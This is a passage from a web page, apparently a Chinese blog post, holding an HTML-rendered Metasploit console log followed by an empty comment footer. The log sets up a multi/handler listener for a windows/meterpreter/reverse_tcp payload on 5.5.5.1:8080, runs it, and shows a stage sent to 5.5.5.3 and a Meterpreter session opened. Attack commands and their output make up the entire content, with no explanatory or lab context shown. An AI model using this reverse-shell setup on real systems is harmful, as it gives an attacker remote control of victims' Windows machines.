<ol class = "dp-xml" > |
<li class = "alt" ><span><span>msf </span><span class = "tag" >></span><span> use exploit/multi/handler </span></span></li> |
<li><span>msf exploit(handler) <span class = "tag" >></span><span> set PAYLOAD windows/meterpreter/reverse_tcp </span></span></li> |
<li class = "alt" ><span><span class = "attribute" >PAYLOAD</span><span> =</span><span class = "tag" >></span><span> windows/meterpreter/reverse_tcp </span></span></li> |
<li><span>msf exploit(handler) <span class = "tag" >></span><span> set LHOST 5.5.5.1 </span></span></li> |
<li class = "alt" ><span><span class = "attribute" >LHOST</span><span> =</span><span class = "tag" >></span><span> 5.5.5.1 </span></span></li> |
<li><span>msf exploit(handler) <span class = "tag" >></span><span> set LPORT 8080 </span></span></li> |
<li class = "alt" ><span><span class = "attribute" >LPORT</span><span> =</span><span class = "tag" >></span><span> 8080 </span></span></li> |
<li><span>msf exploit(handler) <span class = "tag" >></span><span> exploit </span></span></li> |
<li class = "alt" ><span> </span></li> |
<li><span>[*] Started reverse handler on 5.5.5.1:8080 </span></li> |
<li class = "alt" ><span>[*] Starting the payload handler... </span></li> |
<li><span>[*] Sending stage (752128 bytes) to 5.5.5.3 </span></li> |
<li class = "alt" ><span>[*] Meterpreter session 1 opened (5.5.5.1:8080 -<span class = "tag" >></span><span> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800 </span></span></li> |
<li><span> </span></li> |
<li class = "alt" ><span>meterpreter <span class = "tag" >></span><span> </span></span></li> |
</ol> |
by: 发表于:2017-11-02 09:49:58 顶(0) | 踩(0) 回复
??
回复评论